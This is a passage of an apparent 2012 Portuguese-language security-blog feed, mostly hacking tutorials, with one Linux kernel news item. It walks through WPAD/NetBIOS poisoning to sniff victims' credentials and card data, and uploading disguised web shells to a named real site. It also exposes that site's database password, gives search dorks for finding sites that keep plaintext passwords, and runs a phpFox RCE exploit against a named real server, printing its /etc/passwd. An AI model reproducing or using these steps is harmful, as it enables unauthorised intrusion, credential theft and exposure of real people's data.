Para iniciar o ataque vamos precisar de um webserver, para podermos explorar o nosso arquivo PAC (wpad.dat). Vamos criar nosso arquivo, configurando-o com nosso endereço IP:<br />
Código:</p>
<pre class="brush: php; title: ;">
function FindProxyForURL(url, host) {
	return &quot;PROXY SEU.IP.AQ.UI:8080&quot;;
}
</pre>
<p>Grave este arquivo na raíz do webserver (/var/www, /home/user/public_html, C:\wamp\www&#8230;). Ele será acessado pelo endereço http://seu.ip.aq.ui/wpdat.dat.<br />
Vamos configurar também um servidor proxy. Você pode Burp Suite ou InterProxy, este último desenvolvido pelo WhiteCollarGroup. Se não me falha a memória, acredito que o Acunetix também possui um servidor proxy. Utilize seu predileto.<br />
Leve em conta que, além de ter o servidor proxy ativo, você vai precisar sniffar todo o tráfego do proxy. O Burp Suite, como é um software desenvolvido para análise de rede, já possui essa funcionalidade. Outros servidores comuns não possuem tal funcionalidade, mas você não precisa deixar de utilizar seu servidor predileto por causa disso. Utilize sniffers como Wireshark ou SocketSniff (tradução SocketSniff para português).<br />
Coloque seu proxy para escutar na porta 8080 (levando em conta que indicamos a porta 8080 no arquivo PAC). Se necessário, coloque também seu sniffer para capturar dados trafegados por essa porta.<br />
Feito isso, vamos spoofar os pacotes NB. Vamos utilizar o Nbpoison.<br />
Após o download, execute no terminal como root:<br />
Código:</p>
<pre class="brush: php; title: ;">
./nbpoison -s seu.ip.aq.ui
</pre>
<p>A partir daí, usuários de sua rede utilizarão sua máquina para requisições broadcast, e sua máquina está preparada para responder a essas requisições.<br />
Se você ler os logs do Apache, vai perceber que usuários estão fazendo requisições em método GET ao seu arquivo wpad.dat. Com isso você saberá que o alvo já importou suas configurações, e já está utilizando sua máquina como proxy.</p>
<p><strong>Por que é invadido?</strong><br />
Se você voltar à janela do sniffer, verá que todos os dados trafegados passam por ele.<br />
Isto quer dizer que é possível ler dados privilegiados, mesmo em método POST (dados enviados em oculto pelos headers HTTP) e cookies.<br />
Ou seja, você poderá ler desde credenciais de e-mails e redes sociais até dados de cartões de crédito.</p>
<p>Este é um ataque em que o alvo pode desconhecer o fato antes, durante e depois de ser atacada.<br />
<strong><br />
Autor: 0KaL</strong></p>

<!-- Links Classifier - WordPress plugin -->
</div><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-4528759947742278";
/* 468x60, criado 09/10/09 */
google_ad_slot = "8214544157";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center>]]></content:encoded>
			<wfw:commentRss>http://www.inw-seguranca.com/2012/04/18/tutorial-sniffando-dados-mitm-por-falha-em-wpad/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tutorial Upload shell[dot]JPG/DOC com Tamper Data</title>
		<link>http://www.inw-seguranca.com/2012/04/09/tutorial-upload-shelldotjpgdoc-com-tamper-data/</link>
		<comments>http://www.inw-seguranca.com/2012/04/09/tutorial-upload-shelldotjpgdoc-com-tamper-data/#comments</comments>
		<pubDate>Mon, 09 Apr 2012 21:07:15 +0000</pubDate>
		<dc:creator>Samukt</dc:creator>
				<category><![CDATA[Pen-Test]]></category>
		<category><![CDATA[Upload shell]]></category>

		<guid isPermaLink="false">http://www.inw-seguranca.com/?p=3222</guid>
		<description><![CDATA[Salve galera, neste tutorial vou mostrar como upar uma shell imagem usando o AddOn Tamper Data e algumas considerações sobre manter o acesso. Primeiramente, precisamos de um alvo. Separei um pra vcs em que fica como tarefa conseguir o login e o painel admin. http://www.theolia.com.br/pt/theolia&#8230;ias.php?cod=10 Agora que vc ja possui acesso, vamos fazer algumas considerações.]]></description>
			<content:encoded><![CDATA[<div id="HOTWordsTxt" name="HOTWordsTxt"><p>Salve galera, neste tutorial vou mostrar como upar uma shell imagem usando o AddOn Tamper Data e algumas considerações sobre manter o acesso.</p>
<p>Primeiramente, precisamos de um alvo.<br />
Separei um pra vcs em que fica como tarefa conseguir o login e o painel admin.</p>
<p>http://www.theolia.com.br/pt/theolia&#8230;ias.php?cod=10</p>
<p><span id="more-3222"></span><br />
Agora que vc ja possui acesso, vamos fazer algumas considerações. Eu disponibilizei o link para estudo geral do forum.<br />
Então por favor, se vc eh um Lammer e deseja impedir o bom funcionamento do tutorial pare por aqui.<br />
Não posso impedir seus atos, mas peço um pouco de respeito para o beneficio de geral.</p>
<p>Continuando&#8230;.</p>
<p>Agora que estamos dentro (e você provavelmente ja adquiriu o Tamper Data para o seu firefox) vamos procurar um local para upload.<br />
Em noticias é possível cadastrar uma nova noticia. Façamos isso.</p>
<p>Perceba que aparece duas opções: <strong>GALERIA e DOCS.</strong><br />
Como nosso objetivo eh upar a shell em formato de imagem vamos em Galeria.</p>
<p>Nessa hora vc deve renomear sua <strong>shell.php para shell.php.jpg</strong><br />
Selecione sua shell.php.jpg mas antes de inserí-la, comece a iniciar alteração com o Tamper Data</p>
<p><a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.theolia.com.br/pt/system/php/tamper%20data%2001.jpg"  class="http jpg external blank"  target="_blank"><img src="http://www.theolia.com.br/pt/system/php/tamper%20data%2001.jpg" alt="" width="500" height="207" /></a></p>
<p>Feito isso vamos inserir nossa shell.<br />
Perceba que o Tamper Data pergunta se vc gostaria de fazer alteração na requisição.<br />
Vamos alterá-la. Em valor do POST procure o nome da sua shell e renomeie a novamente para shell.php e envie</p>
<p><a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.theolia.com.br/pt/system/php/tamper%20data%2003.jpg"  class="http jpg external blank"  target="_blank"><img src="http://www.theolia.com.br/pt/system/php/tamper%20data%2003.jpg" alt="" width="501" height="255" /></a></p>
<p>Você vai perceber que vai ter um erro sobre o tamanho da &#8220;imagem&#8221; e blablabla&#8230;</p>
<p>Ai vc me fala. Poha que tutorial inutil, se vai dar erro pra q ensinar essa merda???<br />
Perseverança meu caro. Muitos talvez desistissem ai. Ainda tem o DOCS, que provavelmente n vai reclamar do tamanho do arquivo.<br />
Eu n precisava ter ido por esse caminho no tutorial, mas queria mostrar que erros acontecem.</p>
<p>Bom, vamos aos DOCS<br />
Tente upar qualquer arquivo pra ele retornar o erro do tipo de arquivo q ele aceita.<br />
<strong><br />
&#8220;Arquivo inválido! Ele deve ser PDF, DOC, DOCX, XLS ou XLSX.&#8221;</strong></p>
<p>Certo. Vamos renomear nossa shell para shell.php.DOC então.<br />
Vamos localiza-la, ativar o Tamper Data (msm procedimento passado), renomeá-la na alteração para shell.php e enviar.<br />
Vuala. Nossa shell foi upada.<br />
Veja só:</p>
<p>Vamos agora ao site, achamos nossa noticia e la esta nossa shell.</p>
<p>Para ver as noticias acessem: <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.theolia.com.br/pt/theolia_noticias.php"  class="http php external self" >http://www.theolia.com.br/pt/theolia_noticias.php</a></p>
<p>Vamos abrir.<br />
Pra nossa decepção ela está como um arquivo txt.</p>
<p>Voltamos ao local de upload e tentando entender oq aconteceu. Percebemos o seguinte:<br />
<strong>1- Retiramos a extensão .DOC, então nosso arquivo ficou shell.php<br />
2- Mas seu nome aparece como teste e apenas isso.<br />
3- Então oq aconteceu foi que a parte anterior a extensão foi substituida pelo nome que escolhemos e a extensão foi retirada pelo Tamper Data<br />
</strong><br />
Então basta chamarmos o arquivo de shell.php<br />
E dessa forma:<br />
<a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.theolia.com.br/pt/system/php/tamper%20data%2005.jpg"  class="http jpg external blank"  target="_blank"><img src="http://www.theolia.com.br/pt/system/php/tamper%20data%2005.jpg" alt="" width="500" height="558" /></a><br />
<a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.theolia.com.br/pt/system/php/tamepr%20data%2004.jpg"  class="http jpg external blank"  target="_blank"><img src="http://www.theolia.com.br/pt/system/php/tamepr%20data%2004.jpg" alt="" width="500" height="379" /></a></p>
<p>Agora basta vc ser feliz</p>
<p>Agora que temos acesso eh sempre bom deixar algumas formas para mantê-lo.</p>
<p>Podemos upar shell em diretorios com muitos arquivos e claro renomeá-las para nomes menos sugestivos<br />
como config.php, notes.php&#8230;. Nada que chame atenção e nada que seja visualizado bastante pelo administrador<br />
Uma idéia eh deixar paginas de simples upload, que podem ser menos chamativas pelo tamanho e conteudo.</p>
<p>Ler os arquvios também é interessante.</p>
<p>Podemos ver coisas como:</p>
<pre class="brush: php; title: ;">
&lt;?php include(&quot;system/php_incs/conecta.php&quot;); ?&gt;
</pre>
<p>E achar o login do banco de dados</p>
<pre class="brush: php; title: ;">
$nomedoservidor = 'dbmy0014.whservidor.com';
$usuariodobanco = 'theolia';
$senhadobanco   = 'fnh838';
$basededados    = 'theolia';
</pre>
<p>Que muitas vezes é o msm login do <strong>FTP e/ou do Cpanel</strong>.</p>
<p>No dia 03/04/2012 foi exposto uma vulnerabilidade no <strong>MOWPOP do WordPress</strong> que permitia upload de imagens no servidor<br />
<a href=" http://1337day.com/exploits/17931" class="external self" ></p>
<p>http://1337day.com/exploits/17931</a></p>
<p>Dessa forma era possivel upar sua shell.</p>
<p>Bom eh isso.<br />
Se você conseguiu aprender a técnica n impessa que outros aprendam também.</p>
<p>Espero que tenham gostado<br />
Se não, na próxima prometo melhorar ;D</p>
<p>Vlw<br />
<strong>Autor: 5k4ll</strong></p>

<!-- Links Classifier - WordPress plugin -->
</div><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-4528759947742278";
/* 468x60, criado 09/10/09 */
google_ad_slot = "8214544157";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center>]]></content:encoded>
			<wfw:commentRss>http://www.inw-seguranca.com/2012/04/09/tutorial-upload-shelldotjpgdoc-com-tamper-data/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tutorial: A importância do Footprinting</title>
		<link>http://www.inw-seguranca.com/2012/04/01/tutorial-a-importancia-do-footprinting/</link>
		<comments>http://www.inw-seguranca.com/2012/04/01/tutorial-a-importancia-do-footprinting/#comments</comments>
		<pubDate>Sun, 01 Apr 2012 18:04:20 +0000</pubDate>
		<dc:creator>Samukt</dc:creator>
				<category><![CDATA[Pen-Test]]></category>
		<category><![CDATA[Footprinting]]></category>

		<guid isPermaLink="false">http://www.inw-seguranca.com/?p=3215</guid>
		<description><![CDATA[O footprinting, geralmente, é a primeira parte de uma invasão ou pentest. Trata-se da busca de informações, usando mecanismos de pesquisas, whois, engenharia social e outros meios. Esta é uma etapa indispensável, pois você conhece o sistema do alvo, os públicos utilizados, pesquisa suas vulnerabilidades, baixa estes públicos utilizados e os testa em sua máquina.]]></description>
			<content:encoded><![CDATA[<div id="HOTWordsTxt" name="HOTWordsTxt"><p>O footprinting, geralmente, é a primeira parte de uma invasão ou pentest. Trata-se da busca de informações, usando mecanismos de pesquisas, whois, engenharia social e outros meios.<br />
Esta é uma etapa indispensável, pois você conhece o sistema do alvo, os públicos utilizados, pesquisa suas vulnerabilidades, baixa estes públicos utilizados e os testa em sua máquina.<br />
Normalmente, acelera o trabalho de um hacker.<br />
<span id="more-3215"></span><br />
Agora, vamos ver sua importância no deface. Digamos que você queira invadir um website que utiliza um sistema de fórum muito conhecido, como PHPBB, e sistema de portal em mesma condição, como o PHP Nuke. A partir daí, você deve entrar em websites de pesquisa de vulnerabilidade (de preferência, cadastrando-se no newsletter), e baixar esses scripts para o seu computador, para que você tenha acesso a áreas que não teria como visitante, e assim pesquisar suas vulnerabilidades.</p>
<p>Vamos ver um exemplo disso na prática?<br />
Vou dar dois exemplos de scripts públicos, utilizados em larga escala, vulneráveis.</p>
<p>O primeiro diz respeito à um sistema de segurança desenvolvido pela Viagiz e distribuido em diversos websites de compartilhamento de scripts open-source. Baixamos o script e o colocamos no servidor.<br />
Vemos sua área de administração e o mais importante: &#8220;desfribamos&#8221; o código e vemos como é feito o cadastro de usuários e a autenticação.<br />
Olha só que interessante: os dados são guardados no diretório /usuarios, em arquivos de texto, e a senha não está criptografada.<br />
Agora, vamos usar o Google para pesquisar por websites vulneráveis, pesquisando por:<br />
Código:</p>
<pre class="brush: php; title: ;">
intitle:Página
intitle:Protegida
intitle:Desenvolvido
intitle:por
intitle:Viagiz.com
</pre>
<p>Olha só que listão! Vamos entrar em qualquer um deles?<br />
Agora, que tal olhar a URL e trocar entrar.php?(&#8230;) por usuarios? Temos a lista de usuários cadastrados. Abrimos qualquer um e temos sua senha! Que incrível!</p>
<p>Agora, vejamos o segundo exemplo. Trata-se de um software criado pela CoffeeCup, chamado Password Wizard. Seu design é sempre o mesmo, em horizontal ou vertical. Baixando o software e o testando, você vê que ele guarda os usuários em um arquivo chamado (nome do projeto).apw.<br />
Vamos pesquisar no Google por:<br />
Código:</p>
<pre class="brush: php; title: ;">
login.swf
</pre>
<p>Vamos ver qualquer um, entrar no código-fonte e procurar pela EMBED ou OBJECT responsável pelo formulário de login (neste caso, em flash). Pegue o nome do arquivo SWF e abra-o, trocando a extensão .swf por .apw. Navegue até o fim do arquivo e&#8230; pronto!</p>
<p>Estes dois exemplos foram para se ter uma ideia e para reforçar a hipótese apresentada no início do post. Procure não utilizar softwares automáticos, leia os HTTP Headers e conheça bem o alvo antes de começar o ataque.</p>
<p>Até a próxima!</p>
<p><strong>Autor: <span style="color: #696969;">0KaL</span></strong></p>

<!-- Links Classifier - WordPress plugin -->
</div><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-4528759947742278";
/* 468x60, criado 09/10/09 */
google_ad_slot = "8214544157";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center>]]></content:encoded>
			<wfw:commentRss>http://www.inw-seguranca.com/2012/04/01/tutorial-a-importancia-do-footprinting/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tutorial: Invadindo websites com phpFox </title>
		<link>http://www.inw-seguranca.com/2012/03/26/tutorial-invadindo-websites-com-phpfox/</link>
		<comments>http://www.inw-seguranca.com/2012/03/26/tutorial-invadindo-websites-com-phpfox/#comments</comments>
		<pubDate>Mon, 26 Mar 2012 17:58:08 +0000</pubDate>
		<dc:creator>Samukt</dc:creator>
				<category><![CDATA[Pen-Test]]></category>

		<guid isPermaLink="false">http://www.inw-seguranca.com/?p=3211</guid>
		<description><![CDATA[Foi descoberta no dia 7 de fevereiro de 2012 e liberada em público anteontem (23/03/2012) uma vulnerabilidade no software phpFox, uma rede social em PHP, muito utilizado. A vulnerabilidade está presente na versão 3.0.1 ou anterior. Trata-se de Remote Command Execution. Uma atualização foi liberada (versão 3.0.2), mas nem todo administrador tem saco pra ficar]]></description>
			<content:encoded><![CDATA[<div id="HOTWordsTxt" name="HOTWordsTxt"><p>Foi descoberta no dia 7 de fevereiro de 2012 e liberada em público anteontem (23/03/2012) uma vulnerabilidade no software phpFox, uma rede social em PHP, muito utilizado.<br />
A vulnerabilidade está presente na versão 3.0.1 ou anterior. Trata-se de Remote Command Execution.<br />
Uma atualização foi liberada (versão 3.0.2), mas nem todo administrador tem saco pra ficar atualizando seus sistemas (essa é a verdade).<br />
<span id="more-3211"></span><br />
É daquelas falhas que há um exploit que já faz tudo pra você. Vou mostrar como utilizar o exploit, mas antes, vamos entender a falha, que está no arquivo <strong>/include/library/phpfox/module/module.class.php</strong>, acessado pelo arquivo<strong> /ajax.php</strong>, das linhas 716 até 754. Veja:</p>
<pre class="brush: php; title: ;">
 716.            $aParts = explode('.', $sClass);
    717.            $sModule = $aParts[0];
    718.            $sComponent = $sType . PHPFOX_DS . substr_replace(str_replace('.', PHPFOX_DS, $sClass), '', 0, strlen($sModule . PHPFOX_DS));
    ...
    748.            if (preg_match('/(.*?)\((.*?)\)/', $sComponent, $aMatches) &amp;&amp; !empty($aMatches[2]))
    749.            {
    750.                eval('$aParams = array_merge($aParams, array(' . $aMatches[2] . '));');
    751.
    752.                $sComponent = $aMatches[1];
    753.                $sClass = $aMatches[1];
    754.            }
</pre>
<p>Note que o vilão principal é a função eval(). Eu sempre digo: eval is evil. Evite ao máximo dos máximos utilizar esta função.<br />
No eval, o programador declara uma variável ao resultado de uma função, array_merge(), mas não trata as variáveis já declaradas utilizadas dentro do eval().<br />
Solução: Atualizar para o phpFox 3.0.2.<br />
Fechando a função array_merge, é possível executar outros códigos. Este exploit permite que você execute códigos no terminal do sistema. Vamos utilizá-lo?<br />
Primeiro, pegue-o <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.exploit-db.com/exploits/18655/"  class="http external self" >aqui</a>. Baixe o arquivo ou copie e salve seu conteúdo.<br />
Você precisa ter instalado o PHP.<br />
Para encontrar websites vulneráveis, utilize a dork:</p>
<pre class="brush: php; title: ;">
intext:&quot;Powered by phpFox Version 3.0.1&quot;
</pre>
<p>Encontramos este website: <a href="www.valestream.com" class="com external self" >www.valestream.com</a><br />
Então, no bash/DOS digite (suponhando que o exploit está salvo como &#8216;phpfox.php&#8217;):</p>
<pre class="brush: php; title: ;">
php phpfox.php www.valestream.com /
</pre>
<p>Explicando:</p>
<p><strong>php phpfox.php</strong> =&gt; diz ao PHP para executar o arquivo phpfox.php<br />
<strong> www.valestream.com</strong> =&gt; domínio<br />
<strong>/</strong> =&gt; local da instalação do phpFox<br />
Como neste caso o sistema estava rodando na raiz, colocamos apenas uma barra. Se ele estivesse instalado no diretório &#8220;phpfox&#8221;, digitaríamos &#8216;/phpfox&#8217;.</p>
<p>Veja o resultado:</p>
<pre class="brush: php; title: ;">
nonono@debian:/nonono$ php phpfox.php www.valestream.com /

+----------------------------------------------------------+
| phpFox &lt;= 3.0.1 Remote Command Execution Exploit by EgiX |
+----------------------------------------------------------+

phofox-shell#
</pre>
<p>Vamos testar:</p>
<pre class="brush: php; title: ;">
phofox-shell# id
uid=1041(t2ypafw4) gid=1033(t2ypafw4) groups=1033(t2ypafw4)
phofox-shell# uname -a
Linux server6.hostinro.com 2.6.18-164.9.1.el5 #1 SMP Tue Dec 15 20:57:57 EST 2009 x86_64 x86_64 x86_64 GNU/Linux
phofox-shell# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
cpanel:x:32001:32001::/usr/local/cpanel:/bin/false
named:x:25:25:Named:/var/named:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
mysql:x:101:103:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/false
cpanelhorde:x:32003:32005::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32004:32006::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32005:32007::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32006:32008::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
hostinro:x:504:501::/home/hostinro:/usr/local/cpanel/bin/noshell
rivonze:x:508:504::/home/rivonze:/usr/local/cpanel/bin/noshell
gabi0001:x:509:505::/home/gabi0001:/usr/local/cpanel/bin/noshell
anndreii:x:510:506::/home/anndreii:/usr/local/cpanel/bin/noshell
tomcat:x:102:99::/home/tomcat:/bin/bash
stefan1:x:514:510::/home/stefan1:/usr/local/cpanel/bin/noshell
trimitef:x:519:515::/home/trimitef:/usr/local/cpanel/bin/noshell
avaos:x:520:516::/home/avaos:/usr/local/cpanel/bin/noshell
csl2ro:x:521:517::/home/csl2ro:/usr/local/cpanel/bin/noshell
mosnicol:x:524:520::/home/mosnicol:/usr/local/cpanel/bin/noshell
pariulzi:x:527:523::/home/pariulzi:/usr/local/cpanel/bin/noshell
cameliab:x:529:525::/home/cameliab:/usr/local/cpanel/bin/noshell
valeabuz:x:530:526::/home/valeabuz:/usr/local/cpanel/bin/noshell
recomand:x:531:527::/home/recomand:/usr/local/cpanel/bin/noshell
jordivil:x:1005:1000::/home/jordivil:/usr/local/cpanel/bin/noshell
recom:x:1006:1001::/home/recom:/usr/local/cpanel/bin/noshell
promovar:x:1007:1002::/home/promovar:/usr/local/cpanel/bin/noshell
cautpeci:x:1008:1003::/home/cautpeci:/usr/local/cpanel/bin/noshell
iaudepen:x:1010:1005::/home/iaudepen:/usr/local/cpanel/bin/noshell
cpaneleximfilter:x:1009:503::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell
artnudep:x:1011:1006::/home/artnudep:/usr/local/cpanel/bin/noshell
clamav:x:103:104:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
driveren:x:1016:1010::/home/driveren:/usr/local/cpanel/bin/noshell
servicel:x:1017:1011::/home/servicel:/usr/local/cpanel/bin/noshell
kameniro:x:1018:1012::/home/kameniro:/usr/local/cpanel/bin/noshell
lumio:x:1019:1013::/home/lumio:/usr/local/cpanel/bin/noshell
stefan:x:1021:1015::/home/stefan:/usr/local/cpanel/bin/noshell
eventtra:x:1022:1016::/home/eventtra:/bin/bash
filmeb:x:1024:1017::/home/filmeb:/usr/local/cpanel/bin/noshell
hostings:x:1026:1019::/home/hostings:/usr/local/cpanel/bin/noshell
raduz:x:1028:1021::/home/raduz:/usr/local/cpanel/bin/noshell
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
tpech6fr:x:1029:1022::/home/tpech6fr:/usr/local/cpanel/bin/noshell
br2m8cle:x:1030:1023::/home/br2m8cle:/usr/local/cpanel/bin/noshell
stefan4:x:1035:1027::/home/stefan4:/usr/local/cpanel/bin/noshell
v9traj6t:x:1036:1028::/home/v9traj6t:/usr/local/cpanel/bin/noshell
procasim:x:1037:1029::/home/procasim:/bin/false
ukick:x:1038:1030::/home/ukick:/usr/local/cpanel/bin/noshell
mabis:x:1040:1032::/home/mabis:/usr/local/cpanel/bin/noshell
t2ypafw4:x:1041:1033::/home/t2ypafw4:/usr/local/cpanel/bin/noshell
smedia:x:1042:1034::/home/smedia:/usr/local/cpanel/bin/noshell
p6v9tp6t:x:1044:1036::/home/p6v9tp6t:/usr/local/cpanel/bin/noshell
pr3wr9tp:x:1045:1037::/home/pr3wr9tp:/usr/local/cpanel/bin/noshell
wr4ph4n9:x:1046:1038::/home/wr4ph4n9:/usr/local/cpanel/bin/noshell
ropiese:x:1047:1039::/home/ropiese:/usr/local/cpanel/bin/noshell
deboala:x:1048:1040::/home/deboala:/usr/local/cpanel/bin/noshell
admin:x:1049:1041::/home/admin:/usr/local/cpanel/bin/noshell
p8tp6vut:x:1050:1042::/home/p8tp6vut:/usr/local/cpanel/bin/noshell
domeniul:x:1051:1043::/home/domeniul:/bin/false
oradesan:x:1052:1044::/home/oradesan:/usr/local/cpanel/bin/noshell
tramvaiu:x:1053:1045::/home/tramvaiu:/usr/local/cpanel/bin/noshell
diseasei:x:1055:1047::/home/diseasei:/usr/local/cpanel/bin/noshell
fr4yp7br:x:1056:1048::/home/fr4yp7br:/usr/local/cpanel/bin/noshell
bodymark:x:1057:1049::/home/bodymark:/bin/false
phofox-shell# ls
ajax.php
core
crossdomain.php
gzip.php
image
image.php
index.html
jscript
mp3
nodb.html
paokara
ppp
ss
sss
style*
style.php
tmp
upgrade.html

phofox-shell#
</pre>
<p>Há algumas restrições: você não pode rodar pontos (&#8220;.&#8221;) e nem parêntesis (&#8220;(&#8221; e &#8220;)&#8221;).</p>
<p>Divertido?<br />
Brinquem direito!</p>
<p>Até mais!<br />
<strong>Autor: 0KaL</strong></p>

<!-- Links Classifier - WordPress plugin -->
</div><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-4528759947742278";
/* 468x60, criado 09/10/09 */
google_ad_slot = "8214544157";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center>]]></content:encoded>
			<wfw:commentRss>http://www.inw-seguranca.com/2012/03/26/tutorial-invadindo-websites-com-phpfox/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Novo núcleo do Linux conta com partes do código do Android</title>
		<link>http://www.inw-seguranca.com/2012/03/19/novo-nucleo-do-linux-conta-com-partes-do-codigo-do-android/</link>
		<comments>http://www.inw-seguranca.com/2012/03/19/novo-nucleo-do-linux-conta-com-partes-do-codigo-do-android/#comments</comments>
		<pubDate>Mon, 19 Mar 2012 16:34:18 +0000</pubDate>
		<dc:creator>Samukt</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Android]]></category>

		<guid isPermaLink="false">http://www.inw-seguranca.com/?p=3206</guid>
		<description><![CDATA[Conforme anúncio oficial no site LKML, ontem foi lançada a versão 3.3 final do núcleo (também conhecido como kernel) do Linux – a base para o desenvolvimento de todas as distribuições desse sistema operacional de código aberto. De acordo com a publicação do Kernel Newbies, a grande novidade dessa recente edição é a fusão do]]></description>
			<content:encoded><![CDATA[<div id="HOTWordsTxt" name="HOTWordsTxt"><p>Conforme anúncio oficial no site <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/https://lkml.org/lkml/2012/3/18/132"  class="https external blank"  target="_blank">LKML</a>, ontem foi lançada a versão 3.3 final do núcleo (também conhecido como <em>kernel</em>) do Linux – a base para o desenvolvimento de todas as distribuições desse sistema operacional de código aberto.</p>
<p><span id="more-3206"></span></p>
<p>De acordo com a publicação do <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://kernelnewbies.org/Linux_3.3?el"  class="http external blank"  target="_blank">Kernel Newbies</a>, a grande novidade dessa recente edição é a fusão do código do Linux com partes das linhas de programação do Android. Essa integração, esperada há muito tempo pelos entusiastas da área, deve facilitar o desenvolvimento de softwares que funcionem em ambas as plataformas.</p>
<p>Além disso, o novo núcleo do Linux recebeu melhorias em muitos de seus sistemas de arquivos – aperfeiçoando o gerenciamento de memória, de rede e da virtualização de aplicativos, além de aumentar a segurança da plataforma por meio da criptografia de dados.</p>

<!-- Links Classifier - WordPress plugin -->
</div><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-4528759947742278";
/* 468x60, criado 09/10/09 */
google_ad_slot = "8214544157";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center>]]></content:encoded>
			<wfw:commentRss>http://www.inw-seguranca.com/2012/03/19/novo-nucleo-do-linux-conta-com-partes-do-codigo-do-android/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tutorial: Clickjacking Básico.</title>
		<link>http://www.inw-seguranca.com/2012/03/12/tutorial-clickjacking-basico/</link>
		<comments>http://www.inw-seguranca.com/2012/03/12/tutorial-clickjacking-basico/#comments</comments>
		<pubDate>Mon, 12 Mar 2012 23:08:14 +0000</pubDate>
		<dc:creator>Samukt</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Pen-Test]]></category>
		<category><![CDATA[clickjacking]]></category>
		<category><![CDATA[tutorial]]></category>

		<guid isPermaLink="false">http://www.inw-seguranca.com/?p=3202</guid>
		<description><![CDATA[Falar hoje rapidamente sobre Clickjacking ou clickhijacking, que é basicamente o usuário clickar em um link mas na verdade está clickando em outro sem que ele saiba. O clickjacking é possível por causa de três &#8220;features&#8221; do HTML. Iframe: Uma pagina é aberta dentro de outra. Opacidade: Elementos podem ter transparência, podendo ser invisíveis. Camadas(Stacking]]></description>
			<content:encoded><![CDATA[<div id="HOTWordsTxt" name="HOTWordsTxt"><p>Falar hoje rapidamente sobre Clickjacking ou clickhijacking, que é basicamente o usuário clickar em um link mas na verdade está clickando em outro sem que ele saiba.<span id="more-3202"></span></p>
